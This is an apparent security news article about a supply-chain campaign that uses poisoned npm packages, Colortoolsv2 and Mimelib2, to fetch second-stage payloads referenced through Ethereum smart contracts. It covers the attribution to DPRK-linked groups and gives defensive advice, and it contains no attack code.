Ethereum smart contracts malware delivery
BlockAI — Hackers have begun using Ethereum smart contracts malware delivery techniques to hide and fetch malicious code, security researchers warn. The campaign, detected in 2024 and active into 2025, uses poisoned npm packages as loaders and instructs victims to pull second-stage payloads via blockchain references. ReversingLabs and other firms tracked the method, which targets developers and, by extension, crypto exchanges and service providers.
The core tactic uses Ethereum smart contracts as a hosting or retrieval mechanism for a secondary payload. By embedding blockchain references, attackers make malware delivery harder to detect with traditional security tools. This Ethereum smart contracts malware delivery pattern exploits trust in open-source components and leverages chain immutability to deliver commands and artifacts.
Stopping npm package poisoning
Attackers relied on npm package poisoning, publishing malicious modules like Colortoolsv2 and Mimelib2 with realistic commit histories and fake community activity. These packages act as loaders that trigger the blockchain calls. Because npm package poisoning is a supply chain attack, developers who install dependencies can unwittingly enable the malware delivery flow.
Open-source software security
Improving open-source software security requires scanning dependencies, verifying maintainers, and monitoring behavior at install time. Teams should treat any unexpected blockchain calls as red flags. Automated checks that flag packages that reference external smart contracts can interrupt this type of malware delivery before it reaches developer machines or CI pipelines.
Colortoolsv2 and Mimelib2
ReversingLabs identified Colortoolsv2 and Mimelib2 as carriers used to initiate the scheme. Both modules appeared benign but contained code that resolved an Ethereum smart contract address and downloaded an encrypted second-stage payload. Analysts say those strings and contract interactions point to a sophisticated, deliberate supply chain attack rather than opportunistic malware.
Lazarus Group ties
Attribution is complex, but the campaign’s infrastructure and operational tempo align with DPRK-linked groups like the Lazarus Group. When attackers leverage blockchain-hosted payloads, the risk broadens: stolen keys, exchange access, and trafficking of funds can follow the initial compromise. Crypto exchanges and custodians are watching these techniques closely.
What defenders should do next
Mitigation is straightforward in principle: lock down dependency policies, add blockchain-call detection to package audits, and use reproducible builds. Threat intel sharing between projects and exchanges can speed takedown and remediation. Remember that attackers will pivot, so a layered approach to supply chain security is essential to prevent future Ethereum smart contracts malware delivery attempts.
Frequently asked questions about Ethereum smart contracts malware delivery (FAQ)
Q: How do Ethereum smart contracts enable malware delivery?
A: Attackers embed references to smart contracts in malicious packages. The package calls the contract or fetches data tied to the contract, which then leads to a second-stage payload — enabling off-chain retrieval and command control.
Q: Which packages were involved?
A: Security teams flagged Colortoolsv2 and Mimelib2 as examples of npm package poisoning used to execute this supply chain attack.
Q: Who is responsible?
A: Analysts point to DPRK-linked actors, with indicators consistent with the Lazarus Group, though attribution can be provisional.
Sources to this article
ReversingLabs, 2025. Analysis of npm package poisoning and blockchain-based malware delivery. ReversingLabs technical report.
